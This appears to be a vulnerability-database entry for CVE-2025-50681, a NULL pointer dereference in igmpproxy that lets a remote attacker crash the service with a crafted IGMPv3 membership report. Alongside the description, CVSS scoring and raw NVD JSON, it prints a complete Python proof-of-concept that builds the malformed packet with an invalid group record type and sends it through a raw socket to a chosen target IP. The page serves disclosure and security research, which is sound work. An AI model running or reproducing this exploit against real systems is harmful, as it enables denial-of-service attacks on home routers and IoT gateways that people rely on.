Security Vulnerability Report
中文
CVE-2025-50681 CVSS 7.5 HIGH

CVE-2025-50681

Published: 2025-12-19 15:15:56
Last Modified: 2026-01-02 14:45:05
Source: [email protected]

Description

igmpproxy 0.4 before commit 2b30c36 allows remote attackers to cause a denial of service (application crash) via a crafted IGMPv3 membership report packet with a malicious source address. Due to insufficient validation in the `recv_igmp()` function in src/igmpproxy.c, an invalid group record type can trigger a NULL pointer dereference when logging the address using `inet_fmtsrc()`. This vulnerability can be exploited by sending malformed multicast traffic to a host running igmpproxy, leading to a crash. igmpproxy is used in various embedded networking environments and consumer-grade IoT devices (such as home routers and media gateways) to handle multicast traffic for IPTV and other streaming services. Affected devices that rely on unpatched versions of igmpproxy may be vulnerable to remote denial-of-service attacks across a LAN .

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:pali:igmpproxy:0.4:*:*:*:*:*:*:* - VULNERABLE
igmpproxy < 0.4
igmpproxy 0.4 (before commit 2b30c36)
igmpproxy (all versions before commit 2b30c36e6ab5b21defb76ec6458ab7687984484c)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-50681 PoC - igmpproxy NULL Pointer Dereference # Target: igmpproxy < 0.4 (before commit 2b30c36) # Effect: Remote Denial of Service via crafted IGMPv3 membership report import socket import struct import sys def create_igmpv3_membership_report(malicious_src_ip, group_address): """ Create a crafted IGMPv3 membership report packet with invalid group record type. This triggers NULL pointer dereference in inet_fmtsrc() function. """ # IGMPv3 Membership Report packet structure # Type: 0x22 (IGMPv3 Membership Report) igmp_type = 0x22 reserved1 = 0x00 checksum = 0x0000 # Will be calculated later # Reserved field reserved2 = 0x0000 # Number of group records (at least 1) num_group_records = 1 # Group record - trigger NULL pointer dereference # Using invalid/unsupported group record type to cause the vulnerability record_type = 0xFF # Invalid record type (should be 1-4) aux_data_len = 0x00 num_sources = 0x0000 # Multicast group address group_addr = socket.inet_aton(group_address) # Construct group record group_record = struct.pack('!BBHH', record_type, aux_data_len, num_sources, 0)[:4] group_record += group_addr # Construct IGMP header igmp_header = struct.pack('!BBHHH', igmp_type, reserved1, checksum, reserved2, num_group_records) # Full packet packet = igmp_header + group_record # Calculate and set checksum checksum = calculate_igmp_checksum(packet, malicious_src_ip) packet = packet[:2] + struct.pack('!H', checksum) + packet[4:] return packet def calculate_igmp_checksum(packet, src_ip): """Calculate IGMP checksum for the packet.""" # Create pseudo-header for checksum calculation pseudo_header = socket.inet_aton(src_ip) + socket.inet_aton('224.0.0.22') + struct.pack('!H', len(packet)) # Combine pseudo-header with packet data data = pseudo_header + packet # Calculate checksum (16-bit one's complement) if len(data) % 2 == 1: data += b'\x00' total = 0 for i in range(0, len(data), 2): total += (data[i] << 8) + data[i+1] while total > 0xFFFF: total = (total & 0xFFFF) + (total >> 16) return ~total & 0xFFFF def exploit(target_ip, malicious_src, group_address='239.255.255.250'): """ Send crafted IGMPv3 packet to trigger CVE-2025-50681. Args: target_ip: IP address of the target running igmpproxy malicious_src: Source IP address to spoof (causes NULL pointer) group_address: Multicast group address """ sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IGMP) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) packet = create_igmpv3_membership_report(malicious_src, group_address) print(f"[*] Sending crafted IGMPv3 Membership Report to {target_ip}") print(f"[*] Malicious source: {malicious_src}") print(f"[*] Target group: {group_address}") print(f"[*] Packet size: {len(packet)} bytes") sock.sendto(packet, (target_ip, 0)) sock.close() print("[+] Packet sent successfully") print("[*] If vulnerable, igmpproxy should crash due to NULL pointer dereference") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_ip> <malicious_src_ip> [group_ip]") print(f"Example: {sys.argv[0]} 192.168.1.1 10.0.0.1") sys.exit(1) target = sys.argv[1] src_ip = sys.argv[2] group = sys.argv[3] if len(sys.argv) > 3 else "239.255.255.250" exploit(target, src_ip, group)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50681", "sourceIdentifier": "[email protected]", "published": "2025-12-19T15:15:55.953", "lastModified": "2026-01-02T14:45:04.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "igmpproxy 0.4 before commit 2b30c36 allows remote attackers to cause a denial of service (application crash) via a crafted IGMPv3 membership report packet with a malicious source address. Due to insufficient validation in the `recv_igmp()` function in src/igmpproxy.c, an invalid group record type can trigger a NULL pointer dereference when logging the address using `inet_fmtsrc()`. This vulnerability can be exploited by sending malformed multicast traffic to a host running igmpproxy, leading to a crash. igmpproxy is used in various embedded networking environments and consumer-grade IoT devices (such as home routers and media gateways) to handle multicast traffic for IPTV and other streaming services. Affected devices that rely on unpatched versions of igmpproxy may be vulnerable to remote denial-of-service attacks across a LAN ."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pali:igmpproxy:0.4:*:*:*:*:*:*:*", "matchCriteriaId": "54643BDE-3F80-448D-91E0-BC06F1277847"}]}]}], "references": [{"url": "https://gist.github.com/miora-sora/dac1612d16c45c2aedb8605478adc28f", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/pali/igmpproxy/issues/97", "source": "[email protected]", "tags": ["Exploit", "Patch", "Issue Tracking"]}, {"url": "https://github.com/younix/igmpproxy/commit/2b30c36e6ab5b21defb76ec6458ab7687984484c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pali/igmpproxy/issues/97", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Issue Tracking"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.